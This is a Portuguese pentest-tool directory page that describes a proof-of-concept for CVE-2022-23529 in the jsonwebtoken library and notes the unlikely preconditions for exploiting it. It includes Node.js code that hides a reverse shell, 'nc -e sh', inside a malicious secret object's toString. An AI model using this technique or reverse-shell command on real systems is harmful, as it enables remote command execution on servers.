Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-23529-Exploration — Exploit de prova de conceito para CVE-2022-23529, demonstrando RCE em bibliotecas JWT vulneráveis via objetos de segredo HMAC maliciosos. | Kitploit
Ferramentas/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

Exploit de prova de conceito para CVE-2022-23529, demonstrando RCE em bibliotecas JWT vulneráveis via objetos de segredo HMAC maliciosos.

Ver Repositório
1há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-23529

As versões da biblioteca JSON Web Token (JWT) anteriores a 3.4.6, 4.0.4 e 4.1.5 são vulneráveis a RCE.

As funções de hash HMAC aceitam qualquer string como entrada, o que leva a RCE.

Devido às pré-condições, essa vulnerabilidade não é provável de ser explorável.

Para explorar essa vulnerabilidade, um atacante precisaria que uma das seguintes condições fosse verdadeira:

  • O servidor não armazena chaves secretas de forma segura.
  • O atacante precisa ter acesso e controle das chaves secretas.

npm install [email protected]

var jwt = require('jsonwebtoken');

criar um token usando o segredo do servidor

var token = jwt.sign({"x":"y"}, 'servers_secret');

criar objeto malicioso contendo um reverse shell (node.js)

var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

servidor verifica o token usando objeto malicioso armazenado como segredo

jwt.verify(token, poisoned_secret_on_server);

Baixar ferramenta